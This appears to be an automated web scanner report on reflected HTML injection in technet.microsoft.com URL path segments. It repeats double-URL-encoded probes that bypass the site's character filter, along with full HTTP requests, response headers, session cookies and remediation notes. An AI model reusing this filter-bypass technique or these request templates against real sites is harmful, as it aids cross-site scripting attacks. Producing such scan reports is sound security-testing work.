<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727042.aspx6ac93"><a>62b42b496c3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497f6%2522%253e%253ca%253ef63f4614f53 was submitted in the REST URL parameter 1. This input was echoed as 497f6"><a>f63f4614f53 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us497f6%2522%253e%253ca%253ef63f4614f53/library/bb727044.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us497f6"><a>f63f4614f53/library/bb727044" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a439%2522%253e%253ca%253ed85afdcabe5 was submitted in the REST URL parameter 2. This input was echoed as 1a439"><a>d85afdcabe5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library1a439%2522%253e%253ca%253ed85afdcabe5/bb727044.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library1a439"><a>d85afdcabe5/bb727044" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb19%2522%253e%253ca%253ead18d4fc7be was submitted in the REST URL parameter 3. This input was echoed as 4eb19"><a>ad18d4fc7be in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727044.aspx4eb19%2522%253e%253ca%253ead18d4fc7be HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:24:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727044.aspx4eb19"><a>ad18d4fc7be" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c2f4%2522%253e%253ca%253e3d2075862fe was submitted in the REST URL parameter 1. This input was echoed as 8c2f4"><a>3d2075862fe in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8c2f4%2522%253e%253ca%253e3d2075862fe/library/bb727046.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8c2f4"><a>3d2075862fe/library/bb727046" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84794%2522%253e%253ca%253e2e6e2b293eb was submitted in the REST URL parameter 2. This input was echoed as 84794"><a>2e6e2b293eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library84794%2522%253e%253ca%253e2e6e2b293eb/bb727046.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:24:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library84794"><a>2e6e2b293eb/bb727046" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac1e%2522%253e%253ca%253e503fa01d590 was submitted in the REST URL parameter 3. This input was echoed as 4ac1e"><a>503fa01d590 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727046.aspx4ac1e%2522%253e%253ca%253e503fa01d590 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:25:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727046.aspx4ac1e"><a>503fa01d590" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc60%2522%253e%253ca%253e2c269684de0 was submitted in the REST URL parameter 1. This input was echoed as 9fc60"><a>2c269684de0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us9fc60%2522%253e%253ca%253e2c269684de0/library/bb727048.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
